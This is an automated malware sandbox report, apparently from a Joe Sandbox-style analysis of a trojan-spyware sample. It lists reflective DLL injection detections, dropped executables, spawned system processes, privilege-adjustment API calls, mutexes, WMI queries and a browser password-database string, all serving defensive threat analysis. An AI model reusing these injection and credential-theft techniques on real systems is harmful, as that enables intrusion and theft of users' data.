                  Source: 7.3.explorer.exe.ca53600.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.2.explorer.exe.e8b0000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.2.explorer.exe.ca53600.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.3.explorer.exe.ca53600.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.3.explorer.exe.ca53600.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.3.explorer.exe.ca53600.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.3.explorer.exe.ca53600.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.3.explorer.exe.ca53600.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 7.0.explorer.exe.8b70000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 6.2.svchost.exe.251e2e7d000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 00000007.00000000.2060880149.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: 00000006.00000002.3291804673.00000251E2E7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@36/60@0/1
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F229E0 GetLastError,FormatMessageW,MessageBoxW,20_2_00007FF641F229E0
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF794834264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,1_2_00007FF794834264
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF7948340E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,1_2_00007FF7948340E4
                  Source: C:\Windows\System32\svchost.exeCode function: 6_2_00007FF7E52B4264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,6_2_00007FF7E52B4264
                  Source: C:\Windows\System32\svchost.exeCode function: 6_2_00007FF7E52B40E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,6_2_00007FF7E52B40E4
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B3270 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,7_2_0E8B3270
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeCode function: 11_2_00007FF7DBD54264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,11_2_00007FF7DBD54264
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeCode function: 11_2_00007FF7DBD540E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,11_2_00007FF7DBD540E4
                  Source: C:\Windows\System32\audiodg.exeCode function: 13_2_00007FF7A91B4264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,13_2_00007FF7A91B4264
                  Source: C:\Windows\System32\audiodg.exeCode function: 13_2_00007FF7A91B40E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,13_2_00007FF7A91B40E4
                  Source: C:\Windows\System32\msiexec.exeCode function: 14_2_00007FF775AE4264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,14_2_00007FF775AE4264
                  Source: C:\Windows\System32\msiexec.exeCode function: 14_2_00007FF775AE40E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,14_2_00007FF775AE40E4
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF794834004 CreateToolhelp32Snapshot,Process32FirstW,wcscmp,Process32NextW,CloseHandle,1_2_00007FF794834004
                  Source: C:\Users\user\Desktop\Grabber.exeCode function: 2_2_004026B8 LoadResource,SizeofResource,FreeResource,2_2_004026B8
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeFile created: C:\Users\user\AppData\Roaming\systemsx.exeJump to behavior
                  Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\worker_RdDwvE
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeMutant created: NULL
                  Source: C:\Windows\System32\audiodg.exeMutant created: \Sessions\1\BaseNamedObjects\worker_kBEqZh
                  Source: C:\Windows\System32\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\worker_BAccdq
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
                  Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\GqgWzd
                  Source: C:\Users\user\Desktop\Grabber.exeFile created: C:\Users\user\AppData\Local\Temp\B334.tmpJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\B334.tmp\B335.tmp\B336.bat C:\Users\user\Desktop\Grabber.exe"
                  Source: K6qneGSDSB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                  Source: C:\Users\user\Desktop\Grabber.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000036AD000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003604000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003697000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003587000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003571000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000361A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: K6qneGSDSB.exeReversingLabs: Detection: 60%
                  Source: unknownProcess created: C:\Users\user\Desktop\K6qneGSDSB.exe "C:\Users\user\Desktop\K6qneGSDSB.exe"
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeProcess created: C:\Users\user\AppData\Roaming\systemsx.exe "C:\Users\user\AppData\Roaming\systemsx.exe"
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeProcess created: C:\Users\user\Desktop\Grabber.exe "Grabber.exe"
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                  Source: C:\Users\user\Desktop\Grabber.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\B334.tmp\B335.tmp\B336.bat C:\Users\user\Desktop\Grabber.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe "C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe"
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe "C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe"
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe "C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe"
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe"
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeProcess created: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe"
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeProcess created: C:\Users\user\AppData\Roaming\systemsx.exe "C:\Users\user\AppData\Roaming\systemsx.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeProcess created: C:\Users\user\Desktop\Grabber.exe "Grabber.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\B334.tmp\B335.tmp\B336.bat C:\Users\user\Desktop\Grabber.exe"Jump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe "C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe" Jump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe "C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe" Jump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe "C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe" Jump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeProcess created: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe"
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\audiodg.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\audiodg.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: ndfapi.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: wdi.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: duser.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: atlthunk.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: ndfapi.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: wdi.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
